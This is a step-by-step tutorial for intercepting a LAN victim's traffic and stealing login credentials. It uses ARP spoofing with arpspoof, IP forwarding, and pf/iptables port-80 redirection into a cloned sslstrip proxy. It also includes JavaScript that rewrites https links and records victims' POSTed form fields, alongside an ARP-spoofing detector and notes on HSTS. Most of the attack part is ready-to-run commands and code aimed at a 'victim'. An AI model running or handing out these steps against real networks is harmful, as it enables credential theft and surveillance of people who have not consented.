Introduction

This article describes how to eavesdrop on a victim's traffic inside a LAN and obtain sensitive information with an SSLstrip attack. The attack is carried out in two steps:

  1. Man-in-the-middle attack (ARP spoofing), to route the victim's traffic through our machine
  2. SSLstrip attack, to downgrade HTTPS to HTTP and read the sensitive data in plain text

Man-in-the-middle attack

In a man-in-the-middle attack the attacker inserts their own machine between two communicating parties and relays the traffic between them. Because every packet passes through the attacker, they can read or modify it, hijack sessions, and steal credentials and other confidential information.

ARP (Address Resolution Protocol)

ARP (Address Resolution Protocol) maps IP addresses to MAC (hardware) addresses. On an Ethernet segment, frames are delivered by MAC address, so before a host can send an IP packet to another host on the same segment it must know that host's MAC address.

Here is how ARP works. Suppose host B needs to send data to host A, whose IP address is 192.168.1.10. To find out which machine is host A, host B broadcasts a request to every host on the segment asking "who has 192.168.1.10?". The other hosts ignore it, and host A replies "192.168.1.10 is at <A's MAC address>", after which the two hosts can exchange data. Every host keeps an ARP cache table of the IP-to-MAC mappings it has learned, so it does not have to broadcast each time. The weakness is that ARP has no authentication: a host caches whatever reply it receives, and a host that already has an entry for an IP address will typically overwrite it when it sees a reply claiming that address from a different MAC. Any machine on the segment can therefore claim to own the gateway's IP address, and that is exactly what ARP spoofing does.
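To make the frame format and the weakness concrete, the following added example (written for this article, not part of the original text or of any tool it uses) encodes and decodes an Ethernet/ARP reply frame and then runs a minimal arpwatch-style detector over two replies: a legitimate one from the gateway and a spoofed one claiming the gateway's IP from another MAC. The MAC and IP addresses are constructed sample values, not taken from a real capture.

```javascript
// Added example: build, parse and watch ARP reply frames.
// All addresses below are constructed sample values.

function macToBytes(mac) {
  return Buffer.from(mac.split(':').map(h => parseInt(h, 16)));
}
function ipToBytes(ip) {
  return Buffer.from(ip.split('.').map(Number));
}
function bytesToMac(buf) {
  return [...buf].map(b => b.toString(16).padStart(2, '0')).join(':');
}
function bytesToIp(buf) {
  return [...buf].join('.');
}

// Build an ARP reply (opcode 2) meaning "senderIp is-at senderMac", addressed
// to the target host. Nothing in the frame proves the sender owns senderIp.
function buildArpReply({ senderMac, senderIp, targetMac, targetIp }) {
  const eth = Buffer.alloc(14);
  macToBytes(targetMac).copy(eth, 0);   // destination MAC
  macToBytes(senderMac).copy(eth, 6);   // source MAC
  eth.writeUInt16BE(0x0806, 12);        // EtherType: ARP
  const arp = Buffer.alloc(28);
  arp.writeUInt16BE(1, 0);              // hardware type: Ethernet
  arp.writeUInt16BE(0x0800, 2);         // protocol type: IPv4
  arp[4] = 6;                           // hardware address length
  arp[5] = 4;                           // protocol address length
  arp.writeUInt16BE(2, 6);              // opcode 2 = reply
  macToBytes(senderMac).copy(arp, 8);
  ipToBytes(senderIp).copy(arp, 14);
  macToBytes(targetMac).copy(arp, 18);
  ipToBytes(targetIp).copy(arp, 24);
  return Buffer.concat([eth, arp]);
}

// Decode an Ethernet frame; returns null if it is not ARP.
function parseArp(frame) {
  if (frame.length < 42 || frame.readUInt16BE(12) !== 0x0806) return null;
  const arp = frame.subarray(14);
  return {
    opcode: arp.readUInt16BE(6),
    senderMac: bytesToMac(arp.subarray(8, 14)),
    senderIp: bytesToIp(arp.subarray(14, 18)),
    targetMac: bytesToMac(arp.subarray(18, 24)),
    targetIp: bytesToIp(arp.subarray(24, 28)),
  };
}

// Minimal detector: remember the first MAC seen for each IP and flag any later
// reply that maps the same IP to a different MAC (the signature of spoofing).
function watchArpReplies(frames) {
  const cache = new Map();
  const alerts = [];
  for (const frame of frames) {
    const p = parseArp(frame);
    if (!p || p.opcode !== 2) continue;
    const known = cache.get(p.senderIp);
    if (known === undefined) {
      cache.set(p.senderIp, p.senderMac);
    } else if (known !== p.senderMac) {
      alerts.push({ ip: p.senderIp, was: known, now: p.senderMac });
    }
  }
  return alerts;
}

// Constructed sample: the real gateway answers once, then an attacker claims
// the gateway's IP with its own MAC, which is what arpspoof sends to a target.
const GATEWAY_IP = '192.168.16.1';
const GATEWAY_MAC = 'aa:bb:cc:dd:ee:01';
const ATTACKER_MAC = 'de:ad:be:ef:00:01';
const VICTIM = { mac: '00:11:22:33:44:55', ip: '192.168.16.134' };

const sampleFrames = [
  buildArpReply({ senderMac: GATEWAY_MAC, senderIp: GATEWAY_IP, targetMac: VICTIM.mac, targetIp: VICTIM.ip }),
  buildArpReply({ senderMac: ATTACKER_MAC, senderIp: GATEWAY_IP, targetMac: VICTIM.mac, targetIp: VICTIM.ip }),
];

console.log(watchArpReplies(sampleFrames));
```

The detector is deliberately naive: a replaced NIC or a failover gateway also changes an IP's MAC, so a production tool such as arpwatch reports such "flip flops" for a human to judge rather than treating every change as an attack. The point of the example is that nothing in the frame itself distinguishes the two replies; only history does.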

Attack preparation

Under macOS:
  1. Install MacPorts from its official website
  2. Update MacPorts: sudo port -d selfupdate
  3. Install dsniff (a toolkit that includes arpspoof): sudo port install dsniff
  4. Install nmap: brew install nmap (if Homebrew is not installed, see the Homebrew website)

Under Linux:
  1. Install dsniff: sudo apt-get install dsniff
  2. Install nmap: sudo apt-get install nmap

Attack steps

1. Find a target

Run nmap to scan the LAN and obtain a list of live hosts. If the router address of the LAN is 192.168.16.1, scan the LAN with nmap -sP 192.168.16.1/24

-sP selects a ping (host discovery) scan; in current nmap releases it is a deprecated alias for -sn. 192.168.16.1/24 covers every address in the segment 192.168.16.1-192.168.16.254, so the output lists each host that responded together with its MAC address, from which you pick a target.

2. Enable IP forwarding

ARP spoofing makes the victim believe that our machine is the gateway, so the victim sends every packet destined for other networks to us. By default a host discards packets that are not addressed to it, so the victim would lose connectivity immediately and notice the attack. To avoid this, enable IP forwarding: our kernel then relays the victim's packets to the real gateway, and the victim keeps working while all of its traffic passes through us.

Under macOS:

sudo sysctl -w net.inet.ip.forwarding=1

Under Linux:

echo 1 > /proc/sys/net/ipv4/ip_forward

3. ARP spoofing

Assume that the victim's IP address is 192.168.16.134, the LAN gateway is 192.168.16.1, and the attacking machine's network interface is en0 (run ifconfig to find the interface name and its IP address). The spoofing command is then:

arpspoof -i en0 -t 192.168.16.134 192.168.16.1

This repeatedly tells only the victim that 192.168.16.1 is at our MAC address. That is enough for the HTTP redirection used later, because the answers to the victim's redirected HTTP requests are generated by our host. If you also want the gateway's replies to the victim in your capture, run a second arpspoof with the target and host arguments swapped so that the gateway's ARP cache is poisoned in the same way. When arpspoof is stopped with Ctrl-C it sends corrective replies that restore the real MAC address in the victim's cache.

4. Analyze data

If the ARP spoofing succeeds, the victim sends all of its outbound traffic through our machine, where Wireshark (or tcpdump) can capture and analyze it.

At this point, the man-in-the-middle attack is complete, and the SSLstrip attack can begin.

SSLStrip attack

SSLstrip is also called an HTTPS downgrade attack. The attacker intercepts the user's traffic and keeps the user talking plain HTTP, while the attacker itself talks to the server normally (over HTTP or HTTPS, whichever the server expects). Everything the user submits, including login credentials, therefore passes through the attacker in clear text.

Attack principle

  1. Intercept the victim's HTTP traffic from the man-in-the-middle position (to experiment without ARP spoofing, point a browser at an HTTP proxy you control)
  2. In redirect responses, rewrite the Location header from https:// to http:// and record the URL
  3. In response bodies, rewrite https:// hyperlinks to http:// and record them
  4. Talk HTTP to the user and HTTPS to the server (for the URLs recorded in the previous steps, which must be requested from the server over HTTPS), so the user's data reaches the attacker in plain text

The attack only works while the browser is willing to send plain HTTP to the site. A browser that has already seen an HTTP Strict-Transport-Security header from the host, or has the host in its built-in HSTS preload list, rewrites the request to HTTPS itself before it leaves the machine, so there is nothing for the attacker to strip.
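The following added example (written for this article; it is not the zsky/sslstrip program the article runs and makes no claim about that program's internals) implements steps 2 to 4 as pure functions with the network I/O left out, so it runs stand-alone. It rewrites a server redirect and a page body, records the downgraded URLs, and then shows that the victim's later plain-HTTP login POST is forwarded upstream over HTTPS while its form fields are visible to the proxy. The hostname, path and form fields are constructed samples.

```javascript
// Added example: the rewriting and bookkeeping at the core of an
// HTTPS-stripping proxy. Hostnames and form data are constructed samples.

// URLs this proxy has already downgraded. A later plain-HTTP request for one
// of them must be forwarded to the real server over HTTPS (step 4).
const strippedUrls = new Set();

function toHttp(url) {
  return url.replace(/^https:\/\//i, 'http://');
}

// Step 2: a redirect to https:// is rewritten to http:// and recorded.
function stripLocation(location) {
  if (!location || !/^https:\/\//i.test(location)) return location;
  const plain = toHttp(location);
  strippedUrls.add(plain);
  return plain;
}

// Step 3: every https:// hyperlink in a response body is rewritten and recorded.
function stripBody(body) {
  return body.replace(/https:\/\/[^\s"'<>]+/gi, url => {
    const plain = toHttp(url);
    strippedUrls.add(plain);
    return plain;
  });
}

// Apply steps 2 and 3 to a server response before relaying it to the victim.
function rewriteServerResponse(resp) {
  const headers = { ...resp.headers };
  if (headers.location) headers.location = stripLocation(headers.location);
  return { status: resp.status, headers, body: stripBody(resp.body || '') };
}

// Step 4: choose the upstream scheme for a victim request and, for a POST,
// return the form fields that now pass through the proxy in clear text.
function handleVictimRequest(req) {
  const url = 'http://' + req.host + req.path;
  const upstream = strippedUrls.has(url) ? url.replace(/^http:\/\//, 'https://') : url;
  const fields = req.method === 'POST'
    ? Object.fromEntries(new URLSearchParams(req.body))
    : null;
  return { upstream, fields };
}

// Constructed exchange: the server redirects the victim's HTTP request to
// HTTPS, the proxy strips the redirect and the link in the body, and the
// victim's login POST then arrives over plain HTTP.
const serverRedirect = {
  status: 302,
  headers: { location: 'https://www.example.com/login' },
  body: '<a href="https://www.example.com/login">Sign in</a>',
};
const rewritten = rewriteServerResponse(serverRedirect);

const victimPost = {
  method: 'POST',
  host: 'www.example.com',
  path: '/login',
  body: 'username=alice&password=hunter2',
};
const result = handleVictimRequest(victimPost);

console.log(rewritten.headers.location, '->', result.upstream, result.fields);
```

Two simplifications are worth knowing about. The record is keyed by exact URL and is shared by all clients; a proxy serving several victims would key it per client so that one victim's history does not change how another's requests are forwarded. And a real stripping proxy also has to handle cookies marked Secure, which a browser will not send over HTTP, by removing that flag from Set-Cookie headers; that is left out here to keep the example focused on URL rewriting.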

Attack to prepare

  1. The man-in-the-middle position from the previous section, so that the victim's HTTP traffic passes through our host
  2. Get the attack code: git clone [email protected]:zsky/sslstrip.git
  3. Install Node.js

Attack steps

Run the program

In the root directory of the SSLstrip checkout, run node index.js. The console prints the port the program listens on, for example 8080.

Import traffic into the SSLStrip program

Under macOS (using the pf packet filter):

  1. Create a new file /etc/pf.anchors/http containing a single redirect rule (pf keywords are lowercase):

     rdr pass on en0 proto tcp from any to any port 80 -> 127.0.0.1 port 8080

  2. Edit /etc/pf.conf and add the two lines rdr-anchor "http-forwarding" and load anchor "http-forwarding" from "/etc/pf.anchors/http" at the positions shown below: the rdr-anchor line goes with the other anchor declarations, and the load anchor line goes at the end.

     For example, /etc/pf.conf might look like this:

      #
      # com.apple anchor point
      #
      scrub-anchor "com.apple/*"
      nat-anchor "com.apple/*"
      rdr-anchor "com.apple/*"
      rdr-anchor "http-forwarding"
      dummynet-anchor "com.apple/*"
      anchor "com.apple/*"
      load anchor "com.apple" from "/etc/pf.anchors/com.apple"
      load anchor "http-forwarding" from "/etc/pf.anchors/http"

  3. Load the rules and enable the packet filter with sudo pfctl -ef /etc/pf.conf (-e enables pf, -f loads the rule file). Running sudo pfctl -e afterwards, as the original steps suggest, is harmless but redundant; if pf is already enabled, sudo pfctl -f /etc/pf.conf is enough to reload the rules.

Under Linux (using the iptables NAT table), run:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

where the last port number (8080 here) is the port the SSLstrip program listens on. PREROUTING only matches packets arriving from the network, such as the forwarded traffic from the victim; connections our own host opens go through OUTPUT instead, so the proxy's upstream requests to port 80 are not looped back into it.

When the attack is finished, remove the rule with iptables -t nat -D PREROUTING 1 (assuming it is the first rule in the chain). To view the NAT table with rule numbers, run iptables -t nat -L --line-numbers

Observe the SSLStrip program console

The redirected traffic now passes through the SSLstrip program, which by default prints to the console the body of every POST request (a login form submission, for example) that would originally have been sent over HTTPS. The victim's browser shows a plain http:// page with no certificate warning, because from its point of view nothing went wrong: it was never offered HTTPS.